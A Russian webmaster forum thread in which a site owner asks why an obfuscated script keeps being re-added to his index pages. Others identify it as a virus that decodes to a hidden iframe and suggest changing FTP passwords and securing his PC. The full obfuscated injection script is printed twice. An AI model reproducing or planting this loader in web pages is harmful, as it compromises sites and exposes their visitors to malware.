В конце индексной странице добавляется какой-то код!

[nexus-invest]

Подскажите в чем дело!
К каждой индексной странице на моем хостинге добавляется вот такой вот код

<script>rkqflmss=[''];jopkbtp(['693C72666D61206572733D63682274743A702F2F653465342E6E6F632F6D6E69']);function jopkbtp(bjyshbi){bjyshbi[4]=function(fvybwj){return(fvybwj[0][fvybwj[1]](fvybwj[2],fvybwj[3]));};bjyshbi[2]=/(..)(..)/g;rkqflmss[1]='write';bjyshbi[3]='%$2%$1';rkqflmss[2]=document;bjyshbi[1]='replace';rkqflmss[0]+=unescape(bjyshbi[4](bjyshbi));return(rkqflmss.slice(0,3).reverse().concat(['',bjyshbi[4]]));};jopkbtp(['632E6967343F2022697774643D682031656867697468313D73207974656C'])[4](jopkbtp(['223D697669736962696C7974683A64696564226E3C3E692F72666D613E65']));</script>

После удаления этого кода, он через время снова появляется!
Что это за хрень???!!!

 

[fafee]

вирус может?

 

[Sanuch]

явно вирус, так как при расшифровке просматривается скрытый ифрейм

 

[tarkut]

Подскажите в чем дело!
К каждой индексной странице на моем хостинге добавляется вот такой вот код

<script>rkqflmss=[''];jopkbtp(['693C72666D61206572733D63682274743A702F2F653465342E6E6F632F6D6E69']);function jopkbtp(bjyshbi){bjyshbi[4]=function(fvybwj){return(fvybwj[0][fvybwj[1]](fvybwj[2],fvybwj[3]));};bjyshbi[2]=/(..)(..)/g;rkqflmss[1]='write';bjyshbi[3]='%$2%$1';rkqflmss[2]=document;bjyshbi[1]='replace';rkqflmss[0]+=unescape(bjyshbi[4](bjyshbi));return(rkqflmss.slice(0,3).reverse().concat(['',bjyshbi[4]]));};jopkbtp(['632E6967343F2022697774643D682031656867697468313D73207974656C'])[4](jopkbtp(['223D697669736962696C7974683A64696564226E3C3E692F72666D613E65']));</script>

После удаления этого кода, он через время снова появляется!
Что это за хрень???!!!

Проверь страницы на исходящие ссылки. Возможно не визуально, но они будут например через pr-cy.ru Счас популярно стало кидать закодированые ссылки в шаблон. Т.е люди качают шаблон ставят на сайт, а владельцу ссылки капает тиц ).

 

[Klepach]

Поменяй на всё пароли, особенно на ФТП. И не пользуйся для ФТП ТоталКомандером.

 

[nexus-invest]

Проверь страницы на исходящие ссылки. Возможно не визуально, но они будут например через pr-cy.ru Счас популярно стало кидать закодированые ссылки в шаблон. Т.е люди качают шаблон ставят на сайт, а владельцу ссылки капает тиц ).

Проверил! С ссылками все нормально!

А если это вирус, то как от него избавиться?! В службу поддержки уже написал!

Как в дальнейшем защититься от такого!!!

 

[ar4ik]

Обычно такое автоматом в index.... прописывается
Часто прячут за большим кол-вом табов, прокрути вправо или включи перенос в редакторе.

 

[moneypool]

А хостинг не бесплатный ли?
А то были времена помню, на рассвете рунета, когда бесплатные хостинги либо в начале страницы, либо в конце лепили свои баннеры

 

[nexus-invest]

Хостинг платный!

К тому же я заметил, что на другом сайте, который использует этот хостинг, такая же беда!

Добавлено через 6 минут

Поменяй на всё пароли, особенно на ФТП. И не пользуйся для ФТП ТоталКомандером.

А почему нельзя использовать тоталкомандер?!
Именно им я и пользуюсь!

 

[wwwitalya]

Да пользуйся чем угодно, только, если хранишь пароли в программе, следи как следует за безопасностью на своем компе: обязательно фаервол, антивирус, не устанавливай подозрительные программы, скачивай обновления для винды и т.д. и т.п. От ФТП-клиента тут ничего не зависит.